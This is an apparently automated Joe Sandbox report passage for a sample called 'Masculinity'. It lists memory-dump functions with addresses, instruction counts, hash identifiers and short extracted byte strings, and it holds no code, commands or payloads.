Opcode Fuzzy Hash: 13154b8e5a0d85634aa4433b3f34b9bdfbb73f2cddee8f78740d2b62685ac931
Instruction Fuzzy Hash: D6D18178E012188FDB55DFA9C984B9EBBF2BF89300F1080A9D809AB365DB355D85CF51

Function 04A62970 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 349d2f9684c54bcfc8911fecbf88a4948693136e5ae17ad92b7cf98f94646853
Instruction ID: f62c4632a3c54ef43188eac82e7895f00f71646cf925045466740de1d88557dc
Opcode Fuzzy Hash: 349d2f9684c54bcfc8911fecbf88a4948693136e5ae17ad92b7cf98f94646853
Instruction Fuzzy Hash: 8FC18F75E00218CFDB14DFA9C954B9DBBB2BF89301F1081A9D809AB365DB355E85CF50

Function 04A6FA78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dfca20b0cab7397807809e23e76d30d76a2181f52686d8df3b1aa7d707f51c6
Instruction ID: bd29fb1847542150b6b2c9bc43f704c1521f086bf358670bd7f993abfd5edd60
Opcode Fuzzy Hash: 4dfca20b0cab7397807809e23e76d30d76a2181f52686d8df3b1aa7d707f51c6
Instruction Fuzzy Hash: 9CC1B475E01218CFDB14DFA9C954B9DBBB2BF89300F1080A9D809AB365DB356E85CF50

Function 04A6CF08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2198ed4fc234d04a8357e3a6c5db7caa4a4818a7eb32cbc479e641b2f5404b5
Instruction ID: c1bec42cb69b48b27ef906f00db6b01a05c59d5e45d13be79368532c1c17dd2c
Opcode Fuzzy Hash: d2198ed4fc234d04a8357e3a6c5db7caa4a4818a7eb32cbc479e641b2f5404b5
Instruction Fuzzy Hash: 58C1B475E01218CFDB14DFA9C944B9DBBB2BF89304F1080A9D809AB365DB355E85CF50

Function 04A62DD0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da14e1460f99f0dbfcc0ae38dce8dcdbd5fd7ba992f5c056bf11e2c0bd82f43
Instruction ID: f29cb1dd13ca955734ab12a577ba2e416356378825392249919f83664c1aa73f
Opcode Fuzzy Hash: 3da14e1460f99f0dbfcc0ae38dce8dcdbd5fd7ba992f5c056bf11e2c0bd82f43
Instruction Fuzzy Hash: 92A10670D00208CFEB14EFA9D944BDDBBB1FF88315F20826AE409AB2A1DB755985CF55

Function 04E80D88 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f96325d1fde162a1b7a3e1e86a8ea50b7e3b1111628b3674fa887008e629ad3d
Instruction ID: 9d750296441dafd519f292238d859d039249b4888f639a588bf9c72a6443b0f1
Opcode Fuzzy Hash: f96325d1fde162a1b7a3e1e86a8ea50b7e3b1111628b3674fa887008e629ad3d
Instruction Fuzzy Hash: 69A19275E012298FEB68DF6AC944B9DFBF2BB88300F14D1A9D40CA7255EB345A85CF11

Function 04E81B50 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f2b9eb0012a94e374a2c401355670a46c338ad0b29041abb75aba7122ba5e8
Instruction ID: 552613de7ae0c9b85ebd1034c51edf422fadf9b2eec60417937ec9e034c9b1d0
Opcode Fuzzy Hash: 45f2b9eb0012a94e374a2c401355670a46c338ad0b29041abb75aba7122ba5e8
Instruction Fuzzy Hash: 74A19275E012188FEB68DF6AC944B9DFBF2AF88300F14D1AAD40DA7254EB345A85CF11

Function 04E82920 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4bef52f90016d5c5c43cc418133ff92e8d4772f395ba5b43ceb896eabf33178
Instruction ID: 1dd72183d5733e24204e8090948e44df7989c7f5647f6b72d27f930efc807775
Opcode Fuzzy Hash: f4bef52f90016d5c5c43cc418133ff92e8d4772f395ba5b43ceb896eabf33178
Instruction Fuzzy Hash: 9BA1A174E012198FEB68DF6AC944B9DBBF2AF88300F14D1E9D50DA7254EB345A85CF10

Function 04E82238 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8f66831123311fbd881975898dda685de443fa269e0e3333da11f17e3d5bfc
Instruction ID: b6ff19063390f2f3491d3e1fc533ea9bdf40c0ff988a9148dc9e65f1635b4938
Opcode Fuzzy Hash: 3c8f66831123311fbd881975898dda685de443fa269e0e3333da11f17e3d5bfc
Instruction Fuzzy Hash: 26A1A374E012198FEB68DF6AC944B9DBBF2AB88300F14D1EAD50CA7254EB745A85CF11

Function 04E83008 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af535b99804131f177053c375e68e1c60509f269b1117ff1105949bc4af5593
Instruction ID: 705c38190d62e5ab5708285a18516679acd803a7ed15db26d18e2107d8004b32
Opcode Fuzzy Hash: 9af535b99804131f177053c375e68e1c60509f269b1117ff1105949bc4af5593
Instruction Fuzzy Hash: 1BA1A474E012198FEB64DF6AC944B9DBBF2BF89300F14D1A9D80CA7254EB355A85CF11

Function 04E836F0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaccecdd992cd07029dfce2ba331e529387526a5633042e036754c5fee2cbfb6
Instruction ID: 9dde97876e427d561212d817bc2b23a643bb293142258f34e32b7cdf78656cf8
Opcode Fuzzy Hash: eaccecdd992cd07029dfce2ba331e529387526a5633042e036754c5fee2cbfb6
Instruction Fuzzy Hash: CCA1A174E012188FEB68DF6AC944B9DBBF2AF88300F14D1A9D80CA7254EB755A85CF11

Function 04E81470 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55daa61e587a13ce2e1f83074ddd4c374c303d9631758d33b2201069e3702955
Instruction ID: 108e51622ffe46b164db8f3ad17b3baee1c377d4c847efe5b5b5ec739a5daa62
Opcode Fuzzy Hash: 55daa61e587a13ce2e1f83074ddd4c374c303d9631758d33b2201069e3702955
Instruction Fuzzy Hash: 7BA19074E012298FEB68DF6AC944B9DFBF2AF88300F14D1A9D44DA7254EB345A85CF11

Function 04A62DCB Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e889194ab465cb06705dc35b9e762e220b1a7aaee7ce1ac3ca9e7225662310b5
Instruction ID: ae987707d2846d93943d43794cc2f2345afe5b7c02d35f2b03a4651324fbccfe
Opcode Fuzzy Hash: e889194ab465cb06705dc35b9e762e220b1a7aaee7ce1ac3ca9e7225662310b5
Instruction Fuzzy Hash: EBA1F771D00208CFEB14DFA9D984BDDBBB1FF88305F208269E409AB2A1DB755985CF55

Function 04AB60D8 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033a5392100187220476487ec6c8bab5e918cbd9e65af0e199fdacab3e2bec4d
Instruction ID: 16d4e2d49b5d576d56632283e46eaa919d9d423017a202b16f2346bb46513c76
Opcode Fuzzy Hash: 033a5392100187220476487ec6c8bab5e918cbd9e65af0e199fdacab3e2bec4d
Instruction Fuzzy Hash: 0F51AF72D056089BEB15DFBDD4926DDFBB2EB88310F00C02AC9546BAA5DB319843CF52

Function 04A63116 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275368155.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4a60000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0776e93ab0b2f185d46318b1fd862066774ccf35b0d440354162a80de9a60b34
Instruction ID: 7bf30b991f140f46e1e8144a6a6f6bd1b8d523a300952b3a0bdade6a6f70dfe6
Opcode Fuzzy Hash: 0776e93ab0b2f185d46318b1fd862066774ccf35b0d440354162a80de9a60b34
Instruction Fuzzy Hash: 82910670D00208CFEB10DFA8D984BDDBBB1FF49311F2092A9E409AB2A1DB759985CF15

Function 04E0F668 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53850eb176a85d4629e52ad618c5d6fe9fa0fe6a08ccb9c63a2096a907c5b75e
Instruction ID: 227c3090f87d211e0915558afb8920c22f8a8d9c89391033079d9cfb6fa5dd1d
Opcode Fuzzy Hash: 53850eb176a85d4629e52ad618c5d6fe9fa0fe6a08ccb9c63a2096a907c5b75e
Instruction Fuzzy Hash: C081D675E00218CFDB14DFA9C980AEEBBB2FF88304F608169D815AB394DB756995CF50

Function 04E07FA8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b61fb48414bc8d4bbf9fccf07acd85f940981a28174f041baa6b1d61a0809a2
Instruction ID: de67d26cc5c1fdf090abbf523380644102d2ef029ad9a718febbd193b571a3e5
Opcode Fuzzy Hash: 7b61fb48414bc8d4bbf9fccf07acd85f940981a28174f041baa6b1d61a0809a2
Instruction Fuzzy Hash: 7A81C675E00219CFDB14DFA9C990AEEBBB2FF88304F208169D815AB394DB356995CF50

Function 04E0F988 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b6bda03743a284c22ff744c477d1fd1e4609a82ae81453f77a99124777d20a
Instruction ID: 63b6f855136596a1c08081bc59212fe65fe4a47c40aef920d537f486f4ade32f
Opcode Fuzzy Hash: c1b6bda03743a284c22ff744c477d1fd1e4609a82ae81453f77a99124777d20a
Instruction Fuzzy Hash: F881D475E00219CFDB14DFA9C980ADEBBB2FF88304F208469D815AB394DB756996CF50

Function 04DF6A80 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275794292.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4df0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee6b89aac511a589ace2440853508fc4c1fdb571a504fae264b8be87e83c892
Instruction ID: a57336db56237671f70048a59f37b07a0f4d84aac5f0752ba5c0c6a26ac7431c
Opcode Fuzzy Hash: 3ee6b89aac511a589ace2440853508fc4c1fdb571a504fae264b8be87e83c892
Instruction Fuzzy Hash: 1781B375E00219CFDB14DFA9C980ADEBBB2FF88304F608569D815AB354DB35A946CF50

Function 04E836E1 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11ee6e47ffb5d2424024e0bf66ada52023955abe51ae464a6d37a96c57e08d4a
Instruction ID: 9a74242e6e1b36317ca95a8157e5a32655acaa884b22a677312e419c2fe1d0d5
Opcode Fuzzy Hash: 11ee6e47ffb5d2424024e0bf66ada52023955abe51ae464a6d37a96c57e08d4a
Instruction Fuzzy Hash: C881A5B1E016198FEB28CF6AC944B9EBAF2BF88300F14C1A9D40DA7254DB745A858F10

Function 04E8146B Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3a00dc6fad7e8868b832a44a195f07f17ba1744ab890c44a512ef34f677b35
Instruction ID: 2f7f6400f8f290f47de5ffc041bd28e4f0cd6f9b40504a7f268af03c1c8b1a46
Opcode Fuzzy Hash: fd3a00dc6fad7e8868b832a44a195f07f17ba1744ab890c44a512ef34f677b35
Instruction Fuzzy Hash: F2718375E016298FEB28DF6AC944B9EFAF2BF88300F14C1A9D40DA7254DB745A858F10

Function 0015EC18 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92870007fb7fd86b693fd8918e9c8ee6f09f7e3df39efe394c60ef27af60b632
Instruction ID: 447915dec2a43f49e08ee80218a8bb73050e33e28b60bd542bf5d3bec2ff3985
Opcode Fuzzy Hash: 92870007fb7fd86b693fd8918e9c8ee6f09f7e3df39efe394c60ef27af60b632
Instruction Fuzzy Hash: D151A674E01219DFDB18DFAAD984A9DBBF2BF89300F24D02AE815AB364DB345945CF14

Function 0015EC0C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82fbf684b484ed2bfcfa382c96a230451341c151de544c8efbd9e6bfa9bce551
Instruction ID: 180e154e9228978c027a47b13773d55d317b844d7ce8dea2a195354f6a268134
Opcode Fuzzy Hash: 82fbf684b484ed2bfcfa382c96a230451341c151de544c8efbd9e6bfa9bce551
Instruction Fuzzy Hash: 5D51A774E00219DFDB18DFAAD894A9DBBF2BF89300F24D02AE815AB364DB345945CF54

Function 04AB5B37 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275505143.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ab0000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a894c77e9f5d6392f4f983e4652addc7597e45e0522e8684df7a95b0ecc0fc
Instruction ID: 6734d58965d5f965b4c65b03db774e12eed59b003198435a2e8802fdc285a462
Opcode Fuzzy Hash: 41a894c77e9f5d6392f4f983e4652addc7597e45e0522e8684df7a95b0ecc0fc
Instruction Fuzzy Hash: BF4102B0E012088FEB18DFAAC9447DEBBF2AF88304F24C069C458BB295DB755946CF54

Function 04E81B3F Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ca2c8323f077f291bb02f56bfc579252b65fecd240d8d04487591b4c1b7bd
Instruction ID: deeb02116e159976f4295c2fedd23b5bf2c60d17686d527fa85bd8b8d0fcb4e6
Opcode Fuzzy Hash: fe6ca2c8323f077f291bb02f56bfc579252b65fecd240d8d04487591b4c1b7bd
Instruction Fuzzy Hash: B4517971E016198BEB28CF5BC9447DEFAF3AFC8204F14C1A9C40DA6254EB744A868F51

Function 04E82911 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1022e5c714627038ebd71ce19c89ae4e1f0e681bfd9d85a3841c9036bf9bd4e
Instruction ID: 2d66681c6018661081266a7216f348b1e3cbf84b0f6ddf6e606905bf5fd61bdd
Opcode Fuzzy Hash: c1022e5c714627038ebd71ce19c89ae4e1f0e681bfd9d85a3841c9036bf9bd4e
Instruction Fuzzy Hash: FD417B71E016598BEB28CF5BD9447DEFAF3AFC9304F14C1A9C50CA6264DB740A858F51

Function 04E80D79 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939c8b12afe7eb9837e595d9e8553c6f8e422d603e93b7bb4d8d75e04e8f27f1
Instruction ID: 540b038c06364435170bf477379c73878db81b4f9e534d12cd76c464e748e507
Opcode Fuzzy Hash: 939c8b12afe7eb9837e595d9e8553c6f8e422d603e93b7bb4d8d75e04e8f27f1
Instruction Fuzzy Hash: D5415A71E016198BEB58CF5BD9447DEFAF3AFC9300F14C1A9C40DA6264DB740A868F51

Function 04E82FFB Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362cecf5376a3803e8df1db9d8645af21d81b62a67e57110d2c8bdfc056d238a
Instruction ID: 3269d9960301cdb9e3e94d9aaabfcfba9c5c87ed51d64a2bd0c279f234c80cb0
Opcode Fuzzy Hash: 362cecf5376a3803e8df1db9d8645af21d81b62a67e57110d2c8bdfc056d238a
Instruction Fuzzy Hash: 45417A71E016588BEB68CF6BC9447DEFAF3AFC9304F14C1A9C40DA6264EB750A858F51

Function 04E82229 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c84db8d822dcea209ace6451d1e33f1e11cebe60a2bb1e90d3222ee5f782b6c4
Instruction ID: cb35ca285bc7919472cd18ece41dcc6a09b5ee55e508f6b483a4f862a22ff4b2
Opcode Fuzzy Hash: c84db8d822dcea209ace6451d1e33f1e11cebe60a2bb1e90d3222ee5f782b6c4
Instruction Fuzzy Hash: C2416A71E016598BEB28CF6BC9447DEFAF3AFC9300F14C1AAC50CA6264DB750A858F51

Function 04E01818 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7004c304f488a4b19a77a549a927e99e83518da5b0c9e7d725353c683ea62a14
Instruction ID: 0420bdf92d22686428e7a7a3e9bcc30c1f1f273e38fdc474eb60f124bd53a215
Opcode Fuzzy Hash: 7004c304f488a4b19a77a549a927e99e83518da5b0c9e7d725353c683ea62a14
Instruction Fuzzy Hash: 80410474E002588BEB18DFAAD9546DEFBF2BF89304F14D06AC419AB254EB355946CF40

Function 04E0F65B Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3275851951.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e00000_Masculinity.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a28df936e3c0806742a711b5a27bd2f57ea6e0471a5b90f46edef538dde17b
Instruction ID: b6b935c42b3f8641884add31ff93b40453d41cd6bd6a66daab96f65d9f8ff167
Opcode Fuzzy Hash: e0a28df936e3c0806742a711b5a27bd2f57ea6e0471a5b90f46edef538dde17b
Instruction Fuzzy Hash: AB310474E002488BEB18DFAAD9406EEFBF2AF89304F14D12AC419BB294DB745946CF50

Function 001576F1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(ocq, xrefs: 001577E9
,gq, xrefs: 00157BA0
(ocq, xrefs: 001578B2
(ocq, xrefs: 00157815
,gq, xrefs: 00157B90
(ocq, xrefs: 00157C0F
(ocq, xrefs: 00157BFF
(ocq, xrefs: 0015772E

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
API String ID: 0-3338910979
Opcode ID: 4186a7ff03db60dbd8fb2fe883719f95a18e8155c74d656fd8c398d646ae3ba1
Instruction ID: 20e7e603af68a88eb5288047d2609992c73585554a081b9e1eaab975f5ee7ca3
Opcode Fuzzy Hash: 4186a7ff03db60dbd8fb2fe883719f95a18e8155c74d656fd8c398d646ae3ba1
Instruction Fuzzy Hash: 72127D30A04205CFCB15CF68E885AAEBBF2FF49315F258599E869DB2A1D730ED45CB50

Function 00150CA0 Relevance: 8.0, Strings: 6, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

& , xrefs: 0015158C
LRcq, xrefs: 00150F19
,! L! p! , xrefs: 00150F95
h , xrefs: 00150F62
`- , xrefs: 00150F3A
' , xrefs: 00151788

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: & $,! L! p! $LRcq$`- $h $'
API String ID: 0-2716815112
Opcode ID: a63d60d6b5e187e802aba132d0d35ccdc0d3f10bb121622ed528232fda183ca7
Instruction ID: 263197d24df9171a06175a68fdd2adf441299571c866f4e59c32fb2ca23d962c
Opcode Fuzzy Hash: a63d60d6b5e187e802aba132d0d35ccdc0d3f10bb121622ed528232fda183ca7
Instruction Fuzzy Hash: DC521D75A40A5ACFCB54DF24DD94A8EBBB2FB48301F5085A5E40EA7365DB342E85CF80

Function 04E847AF Relevance: 7.0, Strings: 5, Instructions: 771
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

& , xrefs: 04E85890
Tecq, xrefs: 04E84D45
,! L! p! , xrefs: 04E85118
h , xrefs: 04E84D8E, 04E84E03, 04E8570E
Tecq, xrefs: 04E84D1E

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID: & $,! L! p! $Tecq$Tecq$h
API String ID: 0-4194517112
Opcode ID: 4887d8bc8fd0b8ffd4b3f036115732e3acd16439591387b41ad5168d5c3d9ddb
Instruction ID: 9fb5fc0b3f3c75d66255e9bf78c712ac21d7fb73d3183f86999b5245ab510f94
Opcode Fuzzy Hash: 4887d8bc8fd0b8ffd4b3f036115732e3acd16439591387b41ad5168d5c3d9ddb
Instruction Fuzzy Hash: CE82C478A41269CFDB64DF24C994BAEB7B2FB49301F5041E9D809A7361DB35AE81CF40

Function 04E847AD Relevance: 7.0, Strings: 5, Instructions: 768
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

& , xrefs: 04E85890
Tecq, xrefs: 04E84D45
,! L! p! , xrefs: 04E85118
h , xrefs: 04E84D8E, 04E84E03, 04E8570E
Tecq, xrefs: 04E84D1E

Memory Dump Source

Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd

Similarity

API ID:
String ID: & $,! L! p! $Tecq$Tecq$h
API String ID: 0-4194517112
Opcode ID: 75ca4e584d05d6a1df9fa0514773ae308af620f14ce0a955fa7fd5720a0b0843
Instruction ID: 45eeb5ffa0b6a65ca35b0e07bd9857979195e4c37b8b1df5467f7a184bfd8d1b
Opcode Fuzzy Hash: 75ca4e584d05d6a1df9fa0514773ae308af620f14ce0a955fa7fd5720a0b0843
Instruction Fuzzy Hash: EA82C378A41269CFDB64DF24C994BAEB7B2FB49301F5041E9D809A7365CB35AE81CF40

Function 00158490 Relevance: 3.2, Strings: 2, Instructions: 703COMMON

Download Yara Rule

Strings

$cq, xrefs: 00158FD7
$cq, xrefs: 00158FB4

Memory Dump Source

Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd

Similarity

API ID:
String ID: $cq$$cq
API String ID: 0-2695052418
Opcode ID: c822c3a583e1c84e98165f99b3dc8bb998f4af5c10047ce8d29593e0ef4434f7
Instruction ID: 27faf66193953114033852ae5d3212ddb3ead7de90c232f2afe8e1790d9c122f
Opcode Fuzzy Hash: c822c3a583e1c84e98165f99b3dc8bb998f4af5c10047ce8d29593e0ef4434f7
Instruction Fuzzy Hash: A1522174A10219CFEB149BA4C850BAEBB77FF88300F1180AED54A6B391DF355E859F91

Function 00155F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Hgq, xrefs: 00156056
Hgq, xrefs: 00156023

